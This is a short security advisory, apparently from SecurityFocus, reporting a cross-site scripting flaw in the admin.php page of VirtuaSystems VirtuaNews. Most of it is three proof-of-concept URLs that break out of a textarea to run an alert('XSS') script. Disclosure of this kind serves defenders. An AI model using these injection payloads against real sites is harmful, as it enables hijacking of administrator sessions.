VirtuaSystems VirtuaNews Admin.PHP Cross-Site Scripting Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/admin.php?action=news_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>
http://www.example.com/admin.php?action=news_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')</script>
http://www.example.com/admin.php?">action=news_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>


 

Privacy Statement
Copyright 2010, SecurityFocus